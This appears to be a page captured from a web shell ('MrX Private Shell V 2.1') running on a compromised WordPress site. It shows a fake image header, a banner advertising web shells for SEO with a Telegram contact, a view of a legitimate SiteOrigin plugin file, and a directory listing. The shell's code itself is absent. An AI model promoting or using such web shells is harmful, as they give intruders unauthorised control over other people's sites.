����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if ( ! defined( 'ABSPATH' ) ) {
exit; // Exit if accessed directly.
}
wp_enqueue_style( 'siteorigin-preview-style', siteorigin_panels_url( 'css/live-editor-preview' . SITEORIGIN_PANELS_CSS_SUFFIX . '.css' ), array(), SITEORIGIN_PANELS_VERSION );
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
<?php wp_head(); ?>
</head>
<body <?php body_class(); ?>>
<div id="content" class="site-content">
<div class="entry-content">
<?php
if( !empty( $_POST['live_editor_panels_data'] ) ) {
$data = json_decode( wp_unslash( $_POST['live_editor_panels_data'] ), true );
if(
!empty( $data['widgets'] ) && (
!class_exists( 'SiteOrigin_Widget_Field_Class_Loader' ) ||
method_exists( 'SiteOrigin_Widget_Field_Class_Loader', 'extend' )
)
) {
$data['widgets'] = SiteOrigin_Panels_Admin::single()->process_raw_widgets( $data['widgets'], false, false );
}
echo siteorigin_panels_render( 'l' . md5( serialize( $data ) ), true, $data);
}
?>
</div><!-- .entry-content -->
</div>
<?php wp_footer(); ?>
</body>
</html>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin-home-page.php | File | 2.88 KB | 0644 |
|
| error_log | File | 4.45 KB | 0644 |
|
| help.php | File | 904 B | 0644 |
|
| js-templates.php | File | 22.65 KB | 0644 |
|
| live-editor-preview.php | File | 1.29 KB | 0644 |
|
| metabox-panels.php | File | 1.13 KB | 0644 |
|